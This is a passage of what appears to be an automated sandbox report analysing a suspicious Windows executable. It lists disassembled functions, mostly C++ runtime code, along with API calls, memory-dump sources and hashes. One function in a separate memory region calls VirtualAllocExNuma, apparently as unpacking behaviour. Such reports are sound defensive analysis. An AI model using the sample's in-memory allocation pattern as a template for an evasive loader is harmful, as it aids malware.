                                  • std::locale::c_str.LIBCPMTD ref: 00406573
                                    • Part of subcall function 00403C80: std::_Lockit::_Lockit.LIBCPMT ref: 00403C8E
                                    • Part of subcall function 00403C80: _Yarn.LIBCPMTD ref: 00403C99
                                    • Part of subcall function 00403C80: _Yarn.LIBCPMTD ref: 00403CA4
                                    • Part of subcall function 00403C80: _Yarn.LIBCPMTD ref: 00403CAF
                                    • Part of subcall function 00403C80: _Yarn.LIBCPMTD ref: 00403CBA
                                    • Part of subcall function 00403C80: _Yarn.LIBCPMTD ref: 00403CC5
                                    • Part of subcall function 00403C80: _Yarn.LIBCPMTD ref: 00403CD0
                                    • Part of subcall function 00403C80: std::bad_exception::bad_exception.LIBCMTD ref: 00403CE3
                                    • Part of subcall function 00403C80: __CxxThrowException@8.LIBVCRUNTIME ref: 00403CF1
                                    • Part of subcall function 00403C80: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00403CFE
                                    • Part of subcall function 00403A00: std::bad_exception::bad_exception.LIBCMTD ref: 00403A0E
                                    • Part of subcall function 00403A00: ctype.LIBCPMTD ref: 00403A23
                                  • std::_Locinfo::~_Locinfo.LIBCPMTD ref: 004065B1
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Yarn$std::_$std::bad_exception::bad_exception$Exception@8LocinfoLocinfo::_Locinfo::~_Locinfo_ctorLockitLockit::_Throwctypestd::locale::c_str
                                  • String ID:
                                  • API String ID: 315514799-0
                                  • Opcode ID: 091e0fd82070fb040a71f3e1f02b09003b5c43ffb62dd9f79cd173250567ab93
                                  • Instruction ID: 0439a88d0379358cd32f1e14798d3cd70838f3a1781f2f9e136434e43e48c070
                                  • Opcode Fuzzy Hash: 091e0fd82070fb040a71f3e1f02b09003b5c43ffb62dd9f79cd173250567ab93
                                  • Instruction Fuzzy Hash: 2B0148B0900208FBDB14DFA4D94679EBB74AB00314F1081BAE8067B2D1DB395F55CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041E49C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 431 41e49c-41e4bf call 41e1ea 434 41e4c1-41e4d4 431->434 435 41e4d6-41e4dc InitializeCriticalSectionAndSpinCount 431->435 436 41e4e2-41e4e4 434->436 435->436
                                  APIs
                                  • InitializeCriticalSectionAndSpinCount.KERNELBASE(00000FA0,-00000020,0041ECD0,-00000020,00000FA0,00000000,?,00000000,?), ref: 0041E4DC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CountCriticalInitializeSectionSpin
                                  • String ID: InitializeCriticalSectionEx
                                  • API String ID: 2593887523-3084827643
                                  • Opcode ID: 0ed38b6d3824a260bdf44b0f09568ceeca4002477d11bb4f653b2507e9e0fd91
                                  • Instruction ID: f9ae875e2d2830c4ac2b5eaa685c5e005b7963c553bdee66d684e632319edaa3
                                  • Opcode Fuzzy Hash: 0ed38b6d3824a260bdf44b0f09568ceeca4002477d11bb4f653b2507e9e0fd91
                                  • Instruction Fuzzy Hash: 25E09236680218B7CB211F52DC06EDE3F15EB54BA0F148422FD2915161C67E9962D6DC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004140B7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 439 4140b7-4140cc call 413f96 441 4140d1-4140d8 439->441 442 4140e9-4140eb TlsAlloc 441->442 443 4140da-4140e8 call 40fd04 441->443
                                  APIs
                                  • try_get_function.LIBVCRUNTIME ref: 004140CC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: try_get_function
                                  • String ID: FlsAlloc
                                  • API String ID: 2742660187-671089009
                                  • Opcode ID: 5311fe89e5bbb6f8144d190ccd1a4ab2de52fc41652baaf0b571373ec61830c6
                                  • Instruction ID: de76b66b3c2e87d6f1debb8ca7eca6cab455fafc8a1351b817e72bbc951ca738
                                  • Opcode Fuzzy Hash: 5311fe89e5bbb6f8144d190ccd1a4ab2de52fc41652baaf0b571373ec61830c6
                                  • Instruction Fuzzy Hash: 64D02B31B813392BC22032C6AC02BEA7A548B04FBAF480073FF0C6128195AD155142DD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004040F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13COMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 447 4040f0-4040f9 call 40d42c 449 4040fe-40410d 447->449
                                  APIs
                                  • std::locale::_Init.LIBCPMT ref: 004040F9
                                    • Part of subcall function 0040D42C: __EH_prolog3.LIBCMT ref: 0040D433
                                    • Part of subcall function 0040D42C: std::_Lockit::_Lockit.LIBCPMT ref: 0040D43E
                                    • Part of subcall function 0040D42C: std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 0040D451
                                    • Part of subcall function 0040D42C: std::locale::_Setgloballocale.LIBCPMT ref: 0040D459
                                    • Part of subcall function 0040D42C: _Yarn.LIBCPMT ref: 0040D46F
                                    • Part of subcall function 0040D42C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040D4AD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::locale::_$Lockitstd::_$H_prolog3InitLocimpLocimp::_Lockit::_Lockit::~_New_SetgloballocaleYarn
                                  • String ID: <q@
                                  • API String ID: 2548088810-2462633153
                                  • Opcode ID: 75d434b3c55fb2c25767f950240ba9db5c06ba5084519fdac0ca74f972394e0b
                                  • Instruction ID: 806fb04aff4bdb560370039d43f85a2470f1566a298686006c663e36eafa8b0e
                                  • Opcode Fuzzy Hash: 75d434b3c55fb2c25767f950240ba9db5c06ba5084519fdac0ca74f972394e0b
                                  • Instruction Fuzzy Hash: D6D0C9B0D05208BBDB04DF95D94296DB7A8DB05304F1041ADE80C57341E572AE149696
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00425066 Relevance: 3.2, APIs: 2, Instructions: 177COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 450 425066-42508e call 424b9d 453 425253-425254 call 424c0e 450->453 454 425094-42509a 450->454 459 425259-42525b 453->459 455 42509d-4250a3 454->455 457 4250a9-4250b5 455->457 458 42519f-4251be call 4116a0 455->458 457->455 460 4250b7-4250bd 457->460 469 4251c1-4251c6 458->469 462 42525c-42526a call 40fcf3 459->462 463 4250c3-4250cf IsValidCodePage 460->463 464 425197-42519a 460->464 463->464 468 4250d5-4250dc 463->468 464->462 470 4250fe-42510b GetCPInfo 468->470 471 4250de-4250ea 468->471 472 425203-42520d 469->472 473 4251c8-4251cd 469->473 476 42518b-425191 470->476 477 42510d-42512c call 4116a0 470->477 475 4250ee-4250f9 471->475 472->469 474 42520f-425239 call 424b5f 472->474 478 425200 473->478 479 4251cf-4251d7 473->479 490 42523a-425249 474->490 481 42524b-42524c call 424c71 475->481 476->453 476->464 477->475 492 42512e-425135 477->492 478->472 483 4251f8-4251fe 479->483 484 4251d9-4251dc 479->484 491 425251 481->491 483->473 483->478 488 4251de-4251e4 484->488 488->483 489 4251e6-4251f6 488->489 489->483 489->488 490->481 490->490 491->459 493 425161-425164 492->493 494 425137-42513c 492->494 495 425169-425170 493->495 494->493 496 42513e-425146 494->496 495->495 497 425172-425186 call 424b5f 495->497 498 425148-42514f 496->498 499 425159-42515f 496->499 497->475 501 425150-425157 498->501 499->493 499->494 501->499 501->501
                                  APIs
                                    • Part of subcall function 00424B9D: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 00424BC8
                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00424EAD,?,00000000,?,00000000,?), ref: 004250C7
                                  • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00424EAD,?,00000000,?,00000000,?), ref: 00425103
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CodeInfoPageValid
                                  • String ID:
                                  • API String ID: 546120528-0
                                  • Opcode ID: 3e86b066bf4ed533688672433e0f4052ebc23263c0b00f9fad16c8bf572d133b
                                  • Instruction ID: b00e4121a54befbb84d2bda0f50c436582f98e79b51d3324210108404a90e8c0
                                  • Opcode Fuzzy Hash: 3e86b066bf4ed533688672433e0f4052ebc23263c0b00f9fad16c8bf572d133b
                                  • Instruction Fuzzy Hash: 9B511470F00A659FDB20CF36E8407BBBBE4EF91304F94446FD09687251D6799946CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041E1EA Relevance: 3.1, APIs: 2, Instructions: 56COMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 503 41e1ea-41e214 504 41e216-41e218 503->504 505 41e21a-41e21c 503->505 506 41e26b-41e26e 504->506 507 41e222-41e229 call 41e11f 505->507 508 41e21e-41e220 505->508 510 41e22e-41e232 507->510 508->506 511 41e251-41e268 510->511 512 41e234-41e242 GetProcAddress 510->512 514 41e26a 511->514 512->511 513 41e244-41e24f call 40f924 512->513 513->514 514->506
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6f185d5f917ed3a6de2f73896cd4e0c3cf0b8691fee3d1d1c92107ee122e87bc
                                  • Instruction ID: c990e1af2b5516ed2a45469fe9b2d4450c615265179bf70ea3c1a226e9c0ca46
                                  • Opcode Fuzzy Hash: 6f185d5f917ed3a6de2f73896cd4e0c3cf0b8691fee3d1d1c92107ee122e87bc
                                  • Instruction Fuzzy Hash: 1601F53F200215AFDF128FAAED5099733A9FFC57207244136FE019B594DA36E8518B49
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040A5A0 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::ios_base::_Init.LIBCPMTD ref: 0040A5AA
                                    • Part of subcall function 004070B0: std::ios_base::clear.LIBCPMTD ref: 0040711C
                                    • Part of subcall function 004070B0: new.LIBCMT ref: 00407123
                                    • Part of subcall function 0040C450: ctype.LIBCPMTD ref: 0040C481
                                  • std::ios_base::_Addstd.LIBCPMT ref: 0040A5F3
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::ios_base::_$AddstdInitctypestd::ios_base::clear
                                  • String ID:
                                  • API String ID: 4021793725-0
                                  • Opcode ID: d5359b80accceb127700b317b594bf4fd35c3c318bb2b937e7c666cc98af3234
                                  • Instruction ID: 5d125a4c0f470632d68f33895832eca0ddbab717b6d1cc60d7a41c3cd710bd2a
                                  • Opcode Fuzzy Hash: d5359b80accceb127700b317b594bf4fd35c3c318bb2b937e7c666cc98af3234
                                  • Instruction Fuzzy Hash: F5F03170A04208EFDB04DF91C991BAEB771BB44304F2041ADE5052B3C2CB35AF50DB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00414369 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 004140B7: try_get_function.LIBVCRUNTIME ref: 004140CC
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00414387
                                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00414392
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                  • String ID:
                                  • API String ID: 806969131-0
                                  • Opcode ID: 9da728a8ac5ba5f22fcb170992721884ad7613fcc42c43d22c8ebd5a4a0731e7
                                  • Instruction ID: 8a2e06084ac01e773ab60376658dff4023199fedf8c9d012dd1d8c1c09ee633e
                                  • Opcode Fuzzy Hash: 9da728a8ac5ba5f22fcb170992721884ad7613fcc42c43d22c8ebd5a4a0731e7
                                  • Instruction Fuzzy Hash: E0D0A93864430614AD1023F67802ACA228848F2BB9BB0079BF93086EC1EA7C80C2212F
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041D295 Relevance: 2.6, APIs: 2, Instructions: 67COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLastError.KERNEL32(?,?,00414CB6,00401405), ref: 0041D299
                                  • SetLastError.KERNEL32(00000000,00414CB6,00401405), ref: 0041D33B
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast
                                  • String ID:
                                  • API String ID: 1452528299-0
                                  • Opcode ID: e6d39e4b534a464421db0187c20716c7080e0e6dd5663b8d9adddf0a52a563fd
                                  • Instruction ID: 8b98d50797470afa0e04d388ae90ad5186526a42c812345aec62986ec25b2485
                                  • Opcode Fuzzy Hash: e6d39e4b534a464421db0187c20716c7080e0e6dd5663b8d9adddf0a52a563fd
                                  • Instruction Fuzzy Hash: 631129B9B052186EE2102B765DC6DEB26489B4536A7500137FD25C61E1D6BCCCC2416E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00424C71 Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCPInfo.KERNEL32(FFFFF9B5,?,00000005,00424EAD,?), ref: 00424CA3
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Info
                                  • String ID:
                                  • API String ID: 1807457897-0
                                  • Opcode ID: 6f795c6f76dd338988b836bd89f080f8d4c8bf7e4b157a4591a9253f110aa54b
                                  • Instruction ID: 8753b2c5cc76c907a0c7ac4c56318f0ba9ec433021d5659f198934512aa63ee3
                                  • Opcode Fuzzy Hash: 6f795c6f76dd338988b836bd89f080f8d4c8bf7e4b157a4591a9253f110aa54b
                                  • Instruction Fuzzy Hash: 51517DB16041689BDB118F29DD84BE6BBACFF96304F5401EAD449C7142C3795D45CF64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004036A0 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                  Download Yara Rule
                                  APIs
                                  • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 004036C5
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                  • String ID:
                                  • API String ID: 3936482309-0
                                  • Opcode ID: b6c05efd78c7e5caa180ca250f1d203424b2bcc091f8b73780a1cfc2184ecb03
                                  • Instruction ID: 7902fc919d1c17492ab1cc7ffb4afcd0c8c32c32fc003c8b3472c96a61902ccf
                                  • Opcode Fuzzy Hash: b6c05efd78c7e5caa180ca250f1d203424b2bcc091f8b73780a1cfc2184ecb03
                                  • Instruction Fuzzy Hash: D411C978A14108EFCB08DF98C69099DBBF1FF89305F648299E9056B355C735AF01EB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00417F30 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,?,?,?,0041D2E2,00000001,00000364,?,00000005,000000FF,?,?,00414CB6,00401405), ref: 00417F71
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 722eeb20406246d4f45ed87f42e3520fa4df828a3c50a0ce097bf4999c6e137f
                                  • Instruction ID: 9aee0afedecdbada69a9e30f4908b58eed82883aaa5734ca2ecbae2eff1ca257
                                  • Opcode Fuzzy Hash: 722eeb20406246d4f45ed87f42e3520fa4df828a3c50a0ce097bf4999c6e137f
                                  • Instruction Fuzzy Hash: 36F0E93264D52567DB216B269C01BDB3768EF817A0B154127FC04962C0CE38DCC3C6ED
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00240838 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 002407DA: GetSystemInfo.KERNELBASE(?), ref: 002407F7
                                  • VirtualAllocExNuma.KERNELBASE(00000000), ref: 0024089D
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411940280.0000000000240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_240000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocInfoNumaSystemVirtual
                                  • String ID:
                                  • API String ID: 449148690-0
                                  • Opcode ID: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                  • Instruction ID: a2dcb66f865b1de42624bc9250ef64b74825ab2ec442d39018592a2dd3ca09da
                                  • Opcode Fuzzy Hash: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                  • Instruction Fuzzy Hash: D7F01870D64309BAEB187BF04D8B76D76789F00301F105565B740771C3DA7856A09EA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004190EC Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,00419465,?,?,?,00000003,00414846,?,004147B5,?,?,004149C4), ref: 0041911E
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 5170a7218ec762228ecb3ddf93c5b79675e84a345c7e991e62c15e66292c1a64
                                  • Instruction ID: 099f54923895ef26ee8c0b5d8900e6df5326b259f005dc1aee25551aefbd1993
                                  • Opcode Fuzzy Hash: 5170a7218ec762228ecb3ddf93c5b79675e84a345c7e991e62c15e66292c1a64
                                  • Instruction Fuzzy Hash: 53E08C3220122676A62036265C196DB2648AB423F0F190127E80592281EA2C8CC141AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403720 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                  Download Yara Rule
                                  APIs
                                  • new.LIBCMT ref: 00403734
                                    • Part of subcall function 004040F0: std::locale::_Init.LIBCPMT ref: 004040F9
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Initstd::locale::_
                                  • String ID:
                                  • API String ID: 1620887387-0
                                  • Opcode ID: 0c173d5caec885834f1ca079fb9a3f4cd39e4802722259f1944fff307c9b3f42
                                  • Instruction ID: bb79945e1b33a062876b9f4fc9bfd4ceefe74c0201631f967b5295d4923d40ac
                                  • Opcode Fuzzy Hash: 0c173d5caec885834f1ca079fb9a3f4cd39e4802722259f1944fff307c9b3f42
                                  • Instruction Fuzzy Hash: 2EF0DAB4D01208EBDB04EF95D54569DBBB4AB44305F1080BAD80577381D7796F15DB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C450 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 004030F0: std::_Lockit::_Lockit.LIBCPMT ref: 004030FB
                                    • Part of subcall function 004030F0: int.LIBCPMTD ref: 0040310D
                                    • Part of subcall function 004030F0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040319E
                                  • ctype.LIBCPMTD ref: 0040C481
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.411959181.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.411956872.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411966384.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000006.00000002.411968976.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_ctype
                                  • String ID:
                                  • API String ID: 2260400482-0
                                  • Opcode ID: 559e00e182da1efc1ee844143e54b5289b8d7ac1d90be60e135f66b04a4fc01f
